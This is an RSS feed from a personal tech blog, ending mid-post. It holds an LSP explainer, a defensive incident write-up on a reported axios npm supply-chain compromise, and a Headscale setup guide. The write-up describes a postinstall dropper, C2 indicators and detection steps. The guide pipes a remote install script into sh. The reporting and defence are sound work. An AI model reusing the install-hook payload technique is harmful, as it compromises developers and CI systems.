<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" 
     xmlns:atom="http://www.w3.org/2005/Atom"
     xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>Nihesh's Blog</title>
    <link>https://blog.niheshr.com</link>
    <description>Technical blog about web development, WebRTC, system administration, and more</description>
    <language>en-us</language>
    <lastBuildDate>Sun, 05 Apr 2026 00:00:00 GMT</lastBuildDate>
    <atom:link href="https://blog.niheshr.com/rss.xml" rel="self" type="application/rss+xml" />
    <item>
      <title><![CDATA[Language Server Protocol (LSP) Explained: What It Is, How It Works, and Why It Matters]]></title>
      <link>https://blog.niheshr.com/language-server-protocol-lsp-explained</link>
      <guid isPermaLink="true">https://blog.niheshr.com/language-server-protocol-lsp-explained</guid>
      <description><![CDATA[A practical guide to LSP: what it is, how it powers modern editors and AI coding tools, and why it beats traditional editor-specific tooling.]]></description>
      <content:encoded><![CDATA[<p>If you have used auto-complete, go-to-definition, rename symbol, or inline diagnostics in a modern editor, you have likely used an LSP-powered workflow.</p>
<p>LSP stands for <strong>Language Server Protocol</strong>. It changed developer tooling by separating editor UI from language intelligence.</p>
<p>This post explains:</p>
<ul>
<li>what LSP is</li>
<li>how LSP works</li>
<li>how AI coding tools use it</li>
<li>why older approaches struggled</li>
<li>concrete examples you can relate to</li>
</ul>
<h2>What is LSP?</h2>
<p><strong>Language Server Protocol (LSP)</strong> is a standard communication protocol between:</p>
<ul>
<li>a <strong>client</strong> (your editor/IDE), and</li>
<li>a <strong>language server</strong> (a process that understands a specific language deeply)</li>
</ul>
<p>Instead of every editor building language support from scratch, editors speak one protocol and reuse language servers.</p>
<p>Think of it as:</p>
<ul>
<li>editor = frontend/UI</li>
<li>language server = backend intelligence</li>
<li>LSP = API contract between them</li>
</ul>
<h2>Why LSP was needed</h2>
<p>Before LSP became common, language tooling was fragmented.</p>
<p>Each editor had to build and maintain separate support for each language. That meant:</p>
<ul>
<li>duplicate effort</li>
<li>inconsistent behavior across editors</li>
<li>uneven quality</li>
<li>slow updates</li>
</ul>
<p>For example, teams using VS Code, Vim/Neovim, Emacs, Sublime Text, and Atom often got very different experiences for the same language.</p>
<p>LSP solved that by giving all editors a shared protocol for language features.</p>
<h2>How LSP works (simple flow)</h2>
<p>When you open a file, this usually happens:</p>
<ol>
<li>Editor starts a language server process (for example, TypeScript server or Pyright).</li>
<li>Editor sends project/file context to the server.</li>
<li>Server builds understanding (symbols, types, references, diagnostics).</li>
<li>As you type, editor sends incremental updates.</li>
<li>Server responds with:<ul>
<li>completions</li>
<li>errors/warnings</li>
<li>definitions/references</li>
<li>rename edits</li>
<li>code actions</li>
</ul>
</li>
<li>Editor renders results in UI.</li>
</ol>
<p>The protocol itself is generally message-based (JSON-RPC over stdio or sockets), but as a user you just feel fast and consistent language intelligence.</p>
<h2>Common LSP features you use daily</h2>
<ul>
<li><strong>Auto-complete</strong> with context-aware suggestions</li>
<li><strong>Go to definition / declaration</strong></li>
<li><strong>Find references</strong></li>
<li><strong>Hover type info / docs</strong></li>
<li><strong>Rename symbol</strong> across files safely</li>
<li><strong>Diagnostics</strong> (errors, warnings, hints)</li>
<li><strong>Code actions</strong> (quick fixes, imports, refactors)</li>
<li><strong>Formatting integration</strong> (via LSP or companion tools)</li>
</ul>
<p>These are no longer tied to one editor vendor.</p>
<h2>LSP and AI editors: same foundation, new UX</h2>
<p>This is the part many people miss: modern AI coding tools are not replacing LSP; they often build on top of it.</p>
<p>Tools such as AI-native editors and coding assistants still need reliable language intelligence for:</p>
<ul>
<li>symbol resolution</li>
<li>project-wide references</li>
<li>diagnostics context</li>
<li>safe rename/refactor boundaries</li>
<li>workspace-aware code actions</li>
</ul>
<p>LSP is frequently the layer that provides this structured context.</p>
<h3>Why this matters for AI workflows</h3>
<p>AI suggestions become much better when grounded in real code intelligence.</p>
<p>Without LSP-like context, an AI tool may generate code that looks correct but breaks project semantics. With LSP context, tools can:</p>
<ul>
<li>navigate definitions accurately</li>
<li>detect type or symbol conflicts earlier</li>
<li>perform safer edits across multiple files</li>
<li>reduce hallucinated imports and broken refactors</li>
</ul>
<p>So the better way to think about it is:</p>
<ul>
<li>LSP = trusted code intelligence layer</li>
<li>AI = reasoning/generation layer</li>
<li>great DX = both working together</li>
</ul>
<h2>Traditional methods (and why they were weaker)</h2>
<p>Before LSP, language support was typically done in one of these ways:</p>
<h3>1) Regex/text-based plugins</h3>
<p>Examples:</p>
<ul>
<li>syntax-only plugins in Vim/Sublime</li>
<li>editor snippets + keyword matching</li>
</ul>
<p>Limitations:</p>
<ul>
<li>no deep semantic understanding</li>
<li>fragile with large codebases</li>
<li>poor rename/refactor safety</li>
</ul>
<h3>2) Editor-specific language plugins/APIs</h3>
<p>Examples:</p>
<ul>
<li>custom VS Code extension language logic only for VS Code</li>
<li>custom JetBrains plugin implementations per language integration path</li>
</ul>
<p>Limitations:</p>
<ul>
<li>repeated implementation across editors</li>
<li>inconsistent feature parity</li>
<li>high maintenance cost</li>
</ul>
<h3>3) Tag/index based navigation</h3>
<p>Examples:</p>
<ul>
<li><code>ctags</code>, <code>etags</code>, static symbol indexers</li>
</ul>
<p>Limitations:</p>
<ul>
<li>good for navigation, weak for type-aware refactoring</li>
<li>no real-time diagnostics at modern scale</li>
<li>hard with dynamic/complex language features</li>
</ul>
<h3>4) Build-tool-only feedback loops</h3>
<p>Examples:</p>
<ul>
<li><code>tsc</code>, <code>mypy</code>, <code>javac</code>, <code>go build</code>, <code>eslint</code> only through terminal</li>
</ul>
<p>Limitations:</p>
<ul>
<li>useful but not interactive while typing</li>
<li>slower “edit -&gt; save -&gt; run -&gt; read output” loop</li>
</ul>
<p>These methods are still useful in specific scenarios, but for day-to-day developer experience, LSP is generally superior.</p>
<h2>Real-world example: TypeScript</h2>
<p>Without LSP-style tooling:</p>
<ul>
<li>you edit code</li>
<li>run <code>tsc</code></li>
<li>parse terminal errors</li>
<li>manually find symbol usages</li>
</ul>
<p>With LSP:</p>
<ul>
<li>diagnostics appear while typing</li>
<li>“rename symbol” updates references across files</li>
<li>go-to-definition and hover type are instant</li>
</ul>
<p>That reduces context-switching and mistake risk.</p>
<h2>Another example: Python</h2>
<p>Using Pyright (LSP server) + your editor:</p>
<ul>
<li>you get type diagnostics in editor</li>
<li>import fixes and code actions</li>
<li>jump-to-definition across project</li>
</ul>
<p>Compare that to terminal-only <code>flake8</code> + <code>mypy</code> loops: still valuable, but slower and less interactive during coding.</p>
<h2>Does LSP replace compilers, linters, and formatters?</h2>
<p>Not exactly.</p>
<p>LSP complements them.</p>
<ul>
<li>Compiler: source of truth for builds</li>
<li>Linters: policy/style/static checks</li>
<li>Formatter: code style consistency</li>
<li>LSP: editor-time interactive intelligence</li>
</ul>
<p>Best setup is layered:</p>
<ul>
<li>LSP for fast feedback while coding</li>
<li>CI checks for strict enforcement</li>
</ul>
<h2>LSP ecosystem examples</h2>
<p>Popular language servers:</p>
<ul>
<li>TypeScript: <code>typescript-language-server</code> / tsserver-backed flows</li>
<li>Python: <code>pyright</code>, <code>pylsp</code></li>
<li>Go: <code>gopls</code></li>
<li>Rust: <code>rust-analyzer</code></li>
<li>C/C++: <code>clangd</code></li>
</ul>
<p>Popular clients/editors:</p>
<ul>
<li>VS Code</li>
<li>Neovim</li>
<li>Emacs</li>
<li>Sublime Text</li>
<li>Helix</li>
</ul>
<p>Same protocol, different editor UX.</p>
<h2>Trade-offs and caveats</h2>
<p>LSP is great, but not magic:</p>
<ul>
<li>Some servers are heavy on memory/CPU in big monorepos.</li>
<li>Feature quality depends on specific server quality.</li>
<li>Dynamic languages can still have ambiguity.</li>
<li>Setup can require tuning (root detection, virtual envs, formatting pipelines).</li>
</ul>
<p>Still, for most teams, the productivity gain is substantial.</p>
<h2>When traditional methods are still useful</h2>
<p>Traditional tools still matter:</p>
<ul>
<li>CLI linters/compilers in CI are mandatory.</li>
<li><code>ctags</code> can be fast for basic navigation in very constrained environments.</li>
<li>Minimal editors in remote boxes may skip full LSP.</li>
</ul>
<p>But for modern local development, LSP gives a better default experience.</p>
<h2>Final takeaway</h2>
<p>LSP succeeded because it standardized language intelligence as a reusable service.</p>
<p>Instead of building N language integrations for N editors, language ecosystems can invest in one strong server and benefit everyone.</p>
<p>And now the same principle extends beyond classic editors: the same language intelligence backbone is helping power modern AI-assisted coding experiences too.</p>]]></content:encoded>
      <pubDate>Sun, 05 Apr 2026 00:00:00 GMT</pubDate>
      <author>contact@niheshr.com (Nihesh Rachakonda)</author>
      <category>lsp</category>
      <category>developer-tools</category>
      <category>editors</category>
      <category>vscode</category>
      <category>neovim</category>
      <category>programming</category>
      <category>ai-coding</category>
      <category>claude-code</category>
      <category>copilot</category>
    </item>
<item>
      <title><![CDATA[Axios npm Hack: What Happened and How to Fix It]]></title>
      <link>https://blog.niheshr.com/axios-npm-hack-what-happened-and-how-to-fix-it</link>
      <guid isPermaLink="true">https://blog.niheshr.com/axios-npm-hack-what-happened-and-how-to-fix-it</guid>
      <description><![CDATA[Axios npm package compromise explained in detail: what happened, who was affected, full attack flow, IOCs, incident response, and prevention steps for teams.]]></description>
      <content:encoded><![CDATA[<p>On March 31, 2026, the npm package <strong>axios</strong> was compromised in a high-impact supply chain attack.</p>
<p>This post is the full breakdown in one place:</p>
<ul>
<li>what happened</li>
<li>why it happened</li>
<li>who was involved (based on public reporting)</li>
<li>how the attack flow worked end-to-end</li>
<li>how it affected developers, CI pipelines, and organizations</li>
<li>what to do now and how to prevent this class of incident</li>
</ul>
<h2>Quick Summary</h2>
<table>
<thead>
<tr>
<th>Item</th>
<th>Details</th>
</tr>
</thead>
<tbody><tr>
<td>Compromised versions</td>
<td><code>axios@1.14.1</code>, <code>axios@0.30.4</code></td>
</tr>
<tr>
<td>Safe versions</td>
<td><code>axios@1.14.0</code>, <code>axios@0.30.3</code></td>
</tr>
<tr>
<td>Malicious dependency</td>
<td><code>plain-crypto-js@4.2.1</code></td>
</tr>
<tr>
<td>Trigger</td>
<td>npm lifecycle script: <code>postinstall</code></td>
</tr>
<tr>
<td>Primary risk</td>
<td>Remote access trojan (RAT) delivery on macOS, Windows, Linux</td>
</tr>
</tbody></table>
<p>If your environment installed the compromised versions, assume compromise until proven otherwise.</p>
<h2>What Happened</h2>
<p>This incident was <strong>not</strong> an axios code bug. It was a package publishing trust breach.</p>
<p>Public analysis across multiple sources indicates this flow:</p>
<ol>
<li>An attacker gained access to an axios maintainer npm publishing path.</li>
<li>A package called <code>plain-crypto-js</code> was staged in advance.</li>
<li>Malicious <code>plain-crypto-js@4.2.1</code> was published with a <code>postinstall</code> dropper.</li>
<li>Two axios versions were published with this dependency added:<ul>
<li><code>axios@1.14.1</code></li>
<li><code>axios@0.30.4</code></li>
</ul>
</li>
<li>On <code>npm install</code>, <code>setup.js</code> in the malicious dependency executed automatically.</li>
<li>The dropper contacted C2 and pulled platform-specific stage-2 payloads.</li>
<li>The package attempted anti-forensics cleanup to hide malicious traces.</li>
</ol>
<p>This was fast, coordinated, and designed for scale.</p>
<h2>Why It Happened</h2>
<p>The root cause appears to be <strong>release pipeline trust failure</strong>, not application logic failure.</p>
<p>The major enabling factors were:</p>
<ul>
<li>A trusted maintainer publishing path was abused.</li>
<li>A long-lived token/manual publish path appears to have been available.</li>
<li>The malicious release looked like a normal semver update.</li>
<li>npm lifecycle scripts (<code>postinstall</code>) execute code during install by design.</li>
<li>Many projects accepted the poisoned versions via normal dependency resolution.</li>
</ul>
<p>In short: attackers abused package trust and install-time code execution.</p>
<h2>Who Did It</h2>
<p>Based on public reporting:</p>
<ul>
<li>The compromised publishes were associated with the maintainer account path linked to <code>jasonsaayman</code>.</li>
<li>Attacker-related emails reported in public analysis included <code>ifstap@proton.me</code> and <code>nrwise@proton.me</code>.</li>
<li>The malicious dependency package was associated with <code>plain-crypto-js</code>.</li>
</ul>
<p>Attribution to a specific threat group is still a separate intelligence question.</p>
<p>Some researchers have discussed possible overlap with DPRK-linked tradecraft, but this should be treated as <strong>investigative context</strong>, not final attribution, unless formally confirmed by authoritative sources.</p>
<h2>Full Attack Flow (End-to-End)</h2>
<h3>Stage 0: Pre-staging</h3>
<p>Attackers first published a clean-looking package version (<code>plain-crypto-js@4.2.0</code>) to establish package history and lower suspicion.</p>
<h3>Stage 1: Weaponization</h3>
<p>They then published <code>plain-crypto-js@4.2.1</code> containing:</p>
<pre><code class="language-json">&quot;scripts&quot;: {
  &quot;postinstall&quot;: &quot;node setup.js&quot;
}
</code></pre>
<p>This is critical because <code>postinstall</code> runs automatically when npm installs the package.</p>
<h3>Stage 2: Distribution through trusted package</h3>
<p>Compromised axios releases added <code>plain-crypto-js@^4.2.1</code> as a dependency.</p>
<p>Any environment resolving those versions pulled and executed the malicious dependency.</p>
<h3>Stage 3: Execution</h3>
<p><code>setup.js</code> (obfuscated JavaScript) decoded runtime strings and executed platform-specific commands.</p>
<p>Reported behavior:</p>
<ul>
<li>platform detection</li>
<li>C2 communication</li>
<li>payload retrieval/launch for macOS, Windows, Linux</li>
</ul>
<h3>Stage 4: Anti-forensics</h3>
<p>The installer attempted to erase or reduce obvious evidence:</p>
<ul>
<li>delete dropper artifacts</li>
<li>replace manifest files with cleaner versions</li>
</ul>
<p>This made post-install inspection harder and increased chance of false confidence.</p>
<h2>Timeline (UTC, Consolidated)</h2>
<p>Public sources align on this sequence:</p>
<ul>
<li><code>plain-crypto-js@4.2.0</code> published as clean decoy</li>
<li><code>plain-crypto-js@4.2.1</code> published with malicious <code>postinstall</code></li>
<li><code>axios@1.14.1</code> published with malicious dependency</li>
<li><code>axios@0.30.4</code> published shortly after (about 39 minutes)</li>
<li>Community detection and maintainer/security response</li>
<li>npm removed compromised versions after a short exposure window</li>
</ul>
<p>Even a short exposure window was enough because CI runners and developer systems perform installs continuously.</p>
<h2>How It Affected Real Systems</h2>
<h3>Developer machines</h3>
<p>Any developer who ran <code>npm install</code> during exposure could have executed malware without direct interaction.</p>
<h3>CI/CD pipelines</h3>
<p>This is the highest-risk path because CI often has:</p>
<ul>
<li>cloud credentials</li>
<li>deployment keys</li>
<li>package publish tokens</li>
<li>signing keys</li>
</ul>
<p>Compromise in CI can become production compromise quickly.</p>
<h3>Transitive dependency consumers</h3>
<p>Teams did not need to explicitly depend on axios to be exposed. Transitive resolution was enough.</p>
<h3>Observed impact</h3>
<p>Security vendors publicly reported substantial real-world endpoint impact during this incident.</p>
<h2>Detection and Triage</h2>
<p>Start simple, then escalate.</p>
<h3>1) Version and dependency checks</h3>
<pre><code class="language-bash">npm ls axios plain-crypto-js
npm ls -g axios
</code></pre>
<h3>2) Lockfile checks</h3>
<pre><code class="language-bash">grep -R --line-number -E &quot;axios@1\.14\.1|axios@0\.30\.4|plain-crypto-js&quot; package-lock.json npm-shrinkwrap.json yarn.lock pnpm-lock.yaml 2&gt;/dev/null
</code></pre>
<h3>3) Git history checks</h3>
<pre><code class="language-bash">git log -p -- package-lock.json | grep -E &quot;plain-crypto-js|axios@1\.14\.1|axios@0\.30\.4&quot;
</code></pre>
<h3>4) Host artifact checks</h3>
<pre><code class="language-bash"># macOS
ls -la /Library/Caches/com.apple.act.mond 2&gt;/dev/null

# Linux
ls -la /tmp/ld.py 2&gt;/dev/null
</code></pre>
<pre><code class="language-powershell"># Windows PowerShell
Test-Path &quot;$env:PROGRAMDATA\wt.exe&quot;
</code></pre>
<h3>5) Network IOC checks</h3>
<pre><code class="language-bash">netstat -an | grep &quot;142.11.206.73&quot;
</code></pre>
<p>Also query EDR, DNS, proxy, and firewall logs for historical beaconing patterns.</p>
<h2>Indicators of Compromise (IOCs)</h2>
<table>
<thead>
<tr>
<th>Type</th>
<th>Value</th>
</tr>
</thead>
<tbody><tr>
<td>Domain</td>
<td><code>sfrclak.com</code></td>
</tr>
<tr>
<td>IP</td>
<td><code>142.11.206.73</code></td>
</tr>
<tr>
<td>Port</td>
<td><code>8000</code></td>
</tr>
<tr>
<td>Path</td>
<td><code>/6202033</code></td>
</tr>
<tr>
<td>Malicious dependency</td>
<td><code>plain-crypto-js@4.2.1</code></td>
</tr>
<tr>
<td>Bad axios versions</td>
<td><code>1.14.1</code>, <code>0.30.4</code></td>
</tr>
</tbody></table>
<p>Likely host artifacts:</p>
<ul>
<li>macOS: <code>/Library/Caches/com.apple.act.mond</code></li>
<li>Windows: <code>%PROGRAMDATA%\wt.exe</code></li>
<li>Linux: <code>/tmp/ld.py</code></li>
</ul>
<p>IOCs are not exhaustive. Absence of one IOC does not prove safety.</p>
<h2>What To Do If You Were Exposed</h2>
<p>If compromised versions were installed, treat the host as potentially compromised.</p>
<h3>Immediate response</h3>
<ol>
<li>Isolate affected endpoints/runners.</li>
<li>Block known IOC infrastructure.</li>
<li>Pause risky deployments from suspect pipelines.</li>
</ol>
<h3>Credential and secret response</h3>
<p>Rotate:</p>
<ul>
<li>account passwords (GitHub, npm, cloud consoles, CI admin users, and email)</li>
<li>npm tokens</li>
<li>cloud/API keys</li>
<li>SSH keys</li>
<li>DB credentials/passwords</li>
<li>CI secrets and signing material</li>
</ul>
<p>Also revoke active sessions where possible and regenerate recovery codes for critical accounts.</p>
<h3>Investigation and recovery</h3>
<ol>
<li>Audit build and deploy history in exposure window.</li>
<li>Review unusual commits, releases, and registry actions.</li>
<li>Rebuild affected systems from clean images where possible.</li>
<li>Preserve evidence for internal review and postmortem.</li>
</ol>
<p>Do not rely on &quot;remove package and continue&quot; as a response strategy.</p>
<h2>How To Prevent This Next Time</h2>
<p>Layer controls instead of relying on one fix.</p>
<h3>1) Lockfile discipline</h3>
<ul>
<li>commit lockfiles</li>
<li>use <code>npm ci</code> in CI</li>
<li>block unexpected lockfile drift</li>
</ul>
<h3>2) Safer version policies</h3>
<pre><code class="language-ini"># .npmrc
save-exact=true
</code></pre>
<h3>3) Lifecycle hardening</h3>
<pre><code class="language-ini"># .npmrc
ignore-scripts=true
</code></pre>
<p>Only use globally after validating compatibility. Some packages rely on install scripts.</p>
<h3>4) Delay brand-new publishes</h3>
<pre><code class="language-bash">npm config set min-release-age 3
</code></pre>
<p>This helps reduce zero-day package ingestion risk.</p>
<h3>5) Monitor dependency anomalies</h3>
<p>Alert on:</p>
<ul>
<li>new transitive dependencies in critical packages</li>
<li>unexpected publisher metadata changes</li>
<li>publish path anomalies (trusted CI vs manual CLI)</li>
<li>suspicious install scripts</li>
</ul>
<h3>6) Restrict CI egress</h3>
<p>Runners should not have broad outbound internet by default.</p>
<p>If malware cannot reach C2, impact is significantly reduced.</p>
<h2>Final Takeaway</h2>
<p>This incident proved that <strong>dependency installation is an execution surface</strong> and must be treated like production attack surface.</p>
<p>Secure coding is necessary, but not sufficient.</p>
<p>Secure dependency intake, secure publishing trust, and fast incident response are now equally important.</p>
<h2>References</h2>
<ul>
<li><a href="https://github.com/theNetworkChuck/axios-attack-guide">https://github.com/theNetworkChuck/axios-attack-guide</a></li>
<li><a href="https://socket.dev/blog/axios-npm-package-compromised">https://socket.dev/blog/axios-npm-package-compromised</a></li>
<li><a href="https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan">https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan</a></li>
<li><a href="https://github.com/axios/axios/issues/10604">https://github.com/axios/axios/issues/10604</a></li>
<li><a href="https://www.huntress.com/blog/supply-chain-compromise-axios-npm-package">https://www.huntress.com/blog/supply-chain-compromise-axios-npm-package</a></li>
<li><a href="https://www.elastic.co/security-labs/axios-one-rat-to-rule-them-all">https://www.elastic.co/security-labs/axios-one-rat-to-rule-them-all</a></li>
</ul>]]></content:encoded>
      <pubDate>Wed, 01 Apr 2026 00:00:00 GMT</pubDate>
      <author>contact@niheshr.com (Nihesh Rachakonda)</author>
      <category>axios</category>
      <category>npm</category>
      <category>supply-chain-security</category>
      <category>javascript</category>
      <category>incident-response</category>
      <category>hack</category>
    </item>
<item>
      <title><![CDATA[Setting Up Headscale: Self-Hosted Tailscale Control Server]]></title>
      <link>https://blog.niheshr.com/headscale-setup</link>
      <guid isPermaLink="true">https://blog.niheshr.com/headscale-setup</guid>
      <description><![CDATA[Complete guide to setting up Headscale, an open-source self-hosted implementation of the Tailscale control server, and connecting clients.]]></description>
      <content:encoded><![CDATA[<p>Headscale is an open-source, self-hosted implementation of the Tailscale control server. It allows you to create your own private mesh VPN network without relying on Tailscale&#39;s cloud infrastructure. This guide walks through setting up Headscale and connecting Tailscale clients.</p>
<h2>What is Headscale?</h2>
<p>Headscale provides:</p>
<ul>
<li>A self-hosted alternative to Tailscale&#39;s coordination server</li>
<li>Full control over your mesh network infrastructure</li>
<li>WireGuard-based secure networking</li>
<li>No dependency on third-party cloud services</li>
<li>Support for all major Tailscale clients</li>
</ul>
<p>If you want the benefits of Tailscale&#39;s mesh VPN but need to keep everything on your own infrastructure, Headscale is the solution.</p>
<h2>Prerequisites</h2>
<ul>
<li>Ubuntu/Debian server (or similar Linux distribution)</li>
<li>Root or sudo access</li>
<li>Domain name pointing to your server</li>
<li>SSL certificate (we&#39;ll use Let&#39;s Encrypt)</li>
<li>Open ports: 443 (HTTPS), 3478 (STUN)</li>
</ul>
<h2>Step 1: Install Headscale</h2>
<p>Download and install the latest Headscale release:</p>
<pre><code class="language-bash">HEADSCALE_VERSION=&quot;&quot; # See above URL for latest version, e.g. &quot;X.Y.Z&quot; (NOTE: do not add the &quot;v&quot; prefix!)
HEADSCALE_ARCH=&quot;&quot; # Your system architecture, e.g. &quot;amd64&quot;
wget --output-document=headscale.deb \
 &quot;https://github.com/juanfont/headscale/releases/download/v${HEADSCALE_VERSION}/headscale_${HEADSCALE_VERSION}_linux_${HEADSCALE_ARCH}.deb&quot;
</code></pre>
<p>Verify the installation:</p>
<pre><code class="language-bash">headscale version
</code></pre>
<h2>Step 2: Configure Nginx with SSL</h2>
<p>Install Nginx and Certbot:</p>
<pre><code class="language-bash">sudo apt update
sudo apt install nginx certbot python3-certbot-nginx -y
</code></pre>
<p>Create an Nginx config for Headscale:</p>
<pre><code class="language-bash">sudo nano /etc/nginx/sites-available/headscale
</code></pre>
<p>Add the following configuration:</p>
<pre><code class="language-nginx">server {
    listen 80;
    server_name headscale.your-domain.com;

    location / {
        proxy_pass http://127.0.0.1:8080;
        proxy_http_version 1.1;
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection &quot;upgrade&quot;;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
        proxy_buffering off;
        proxy_read_timeout 86400;
    }
}
</code></pre>
<p>Enable the site and obtain SSL certificate:</p>
<pre><code class="language-bash">sudo ln -s /etc/nginx/sites-available/headscale /etc/nginx/sites-enabled/
sudo nginx -t
sudo systemctl reload nginx
sudo certbot --nginx -d headscale.your-domain.com
</code></pre>
<p>Certbot will automatically configure SSL and set up auto-renewal.</p>
<h2>Step 3: Configure Headscale</h2>
<p>Edit the configuration file:</p>
<pre><code class="language-bash">sudo nano /etc/headscale/config.yaml
</code></pre>
<p>Here&#39;s a recommended configuration:</p>
<pre><code class="language-yaml"># Server configuration
server_url: https://headscale.your-domain.com
listen_addr: 127.0.0.1:8080
metrics_listen_addr: 127.0.0.1:9090

# gRPC settings
grpc_listen_addr: 127.0.0.1:50443
grpc_allow_insecure: false

# Database configuration
database:
  type: sqlite
  sqlite:
    path: /var/lib/headscale/db.sqlite

# TLS handled by Nginx reverse proxy
tls_cert_path: &quot;&quot;
tls_key_path: &quot;&quot;

# Noise protocol (required for newer clients)
noise:
  private_key_path: /var/lib/headscale/noise_private.key

# IP prefixes for your network
prefixes:
  v4: 100.64.0.0/10
  v6: fd7a:115c:a1e0::/48

# DERP configuration
derp:
  server:
    enabled: true
    region_id: 999
    region_code: &quot;headscale&quot;
    region_name: &quot;Headscale Embedded DERP&quot;
    stun_listen_addr: &quot;0.0.0.0:3478&quot;
    private_key_path: /var/lib/headscale/derp_server_private.key
    automatically_add_embedded_derp_region: true
    ipv4: YOUR_PUBLIC_IP
    ipv6: &quot;&quot;
  urls: []
  paths: []
  auto_update_enabled: true
  update_frequency: 24h

# Disable external DERP servers (optional, for full self-hosting)
# derp:
#   urls: []

# DNS configuration
dns:
  magic_dns: true
  base_domain: tailnet.your-domain.com
  nameservers:
    global:
      - 1.1.1.1
      - 8.8.8.8

# Log settings
log:
  format: text
  level: info

# Policy (ACLs) - optional
policy:
  mode: file
  path: &quot;&quot;

# Unix socket for CLI
unix_socket: /var/run/headscale/headscale.sock
unix_socket_permission: &quot;0770&quot;
</code></pre>
<p>Replace the following values:</p>
<ul>
<li><code>headscale.your-domain.com</code> with your actual domain</li>
<li><code>YOUR_PUBLIC_IP</code> with your server&#39;s public IP address</li>
<li><code>tailnet.your-domain.com</code> with your preferred MagicDNS base domain</li>
</ul>
<h2>Step 4: Create Required Directories</h2>
<pre><code class="language-bash">sudo mkdir -p /var/lib/headscale
sudo mkdir -p /var/run/headscale
sudo chown -R headscale:headscale /var/lib/headscale
sudo chown -R headscale:headscale /var/run/headscale
</code></pre>
<h2>Step 5: Configure Firewall</h2>
<p>Allow the necessary ports:</p>
<pre><code class="language-bash">sudo ufw allow &#39;Nginx Full&#39;
sudo ufw allow 3478/udp
sudo ufw reload
</code></pre>
<p>For cloud providers, ensure your security groups allow:</p>
<ul>
<li><strong>TCP:</strong> 80, 443 (HTTP/HTTPS via Nginx)</li>
<li><strong>UDP:</strong> 3478 (STUN for DERP)</li>
</ul>
<h2>Step 6: Start Headscale</h2>
<p>Enable and start the service:</p>
<pre><code class="language-bash">sudo systemctl enable headscale
sudo systemctl start headscale
sudo systemctl status headscale
</code></pre>
<p>Check the logs for any errors:</p>
<pre><code class="language-bash">sudo journalctl -u headscale -f
</code></pre>
<h2>Step 7: Create a User</h2>
<p>Headscale organizes devices by users. Create your first user:</p>
<pre><code class="language-bash">sudo headscale users create myuser
</code></pre>
<p>List users:</p>
<pre><code class="language-bash">sudo headscale users list
</code></pre>
<h2>Step 8: Generate Pre-Authentication Keys</h2>
<p>Pre-auth keys allow devices to join without manual approval:</p>
<pre><code class="language-bash"># Create a reusable key (expires in 24 hours by default)
sudo headscale preauthkeys create --user myuser --reusable --expiration 24h
</code></pre>
<p>For a one-time use key:</p>
<pre><code class="language-bash">sudo headscale preauthkeys create --user myuser --expiration 1h
</code></pre>
<p>List existing keys:</p>
<pre><code class="language-bash">sudo headscale preauthkeys list --user myuser
</code></pre>
<h2>Step 9: Connect Tailscale Clients</h2>
<h3>Linux Client</h3>
<p>Install Tailscale:</p>
<pre><code class="language-bash">curl -fsSL https://tailscale.com/install.sh | sh
</code></pre>
<p>Connect to your Headscale server:</p>
<pre><code class="language-bash">sudo tailscale up --login-server https://headscale.your-domain.com --authkey YOUR_PREAUTH_KEY
</code></pre>
<p>Or without a pre-auth key (requires manual approval):</p>
<pre><code class="language-bash">sudo tailscale up --login-server https://headscale.your-domain.com
</code></pre>
<p>Then approve the node on the server:</p>
<pre><code class="language-bash">sudo headscale nodes register --user myuser --key nodekey:XXXXX
</code></pre>
<h3>macOS Client</h3>
<p>Install Tailscale from the App Store or via Homebrew:</p>
<pre><code class="language-bash">brew install tailscale
</code></pre>
<p>Connect using the CLI:</p>
<pre><code class="language-bash">tailscale up --login-server https://headscale.your-domain.com --authkey YOUR_PREAUTH_KEY
</code></pre>
<h3>Windows Client</h3>
<ol>
<li>Download Tailscale from <a href="https://tailscale.com/download">tailscale.com/download</a></li>
<li>Open PowerShell as Administrator</li>
<li>Run:</li>
</ol>
<pre><code class="language-powershell">tailscale up --login-server https://headscale.your-domain.com --authkey YOUR_PREAUTH_KEY
</code></pre>
<h3>iOS and Android</h3>
<p>For mobile devices, you&#39;ll need to use the web-based registration flow:</p>
<ol>
<li>Install Tailscale from the App Store or Play Store</li>
<li>On your server, generate a registration URL:</li>
</ol>
<pre><code class="language-bash">sudo headscale nodes register --user myuser --key nodekey:XXXXX
</code></pre>
<ol start="3">
<li>Open the Tailscale app and use the custom login server option</li>
</ol>
<h2>Step 10: Managing Nodes</h2>
<p>List all connected nodes:</p>
<pre><code class="language-bash">sudo headscale nodes list
</code></pre>
<p>Delete a node:</p>
<pre><code class="language-bash">sudo headscale nodes delete --identifier NODE_ID
</code></pre>
<p>Rename a node:</p>
<pre><code class="language-bash">sudo headscale nodes rename --identifier NODE_ID &quot;new-hostname&quot;
</code></pre>
<p>Move a node to a different user:</p>
<pre><code class="language-bash">sudo headscale nodes move --identifier NODE_ID --user newuser
</code></pre>
<h2>Step 11: Enable Exit Nodes (Optional)</h2>
<p>To use a node as an exit node for routing all traffic:</p>
<p>On the exit node:</p>
<pre><code class="language-bash">sudo tailscale up --login-server https://headscale.your-domain.com --advertise-exit-node
</code></pre>
<p>Approve the exit node on the server:</p>
<pre><code class="language-bash">sudo headscale routes enable --route &quot;0.0.0.0/0&quot; --identifier NODE_ID
sudo headscale routes enable --route &quot;::/0&quot; --identifier NODE_ID
</code></pre>
<p>On client devices, use the exit node:</p>
<pre><code class="language-bash">tailscale up --exit-node=EXIT_NODE_IP
</code></pre>
<h2>Step 12: Configure Access Control (ACLs)</h2>
<p>Create an ACL policy file:</p>
<pre><code class="language-bash">sudo nano /etc/headscale/acl.json
</code></pre>
<p>Example policy allowing all users to communicate:</p>
<pre><code class="language-json">{
  &quot;acls&quot;: [
    {
      &quot;action&quot;: &quot;accept&quot;,
      &quot;src&quot;: [&quot;*&quot;],
      &quot;dst&quot;: [&quot;*:*&quot;]
    }
  ],
  &quot;tagOwners&quot;: {},
  &quot;hosts&quot;: {}
}
</code></pre>
<p>Update the config to use the ACL file:</p>
<pre><code class="language-yaml">policy:
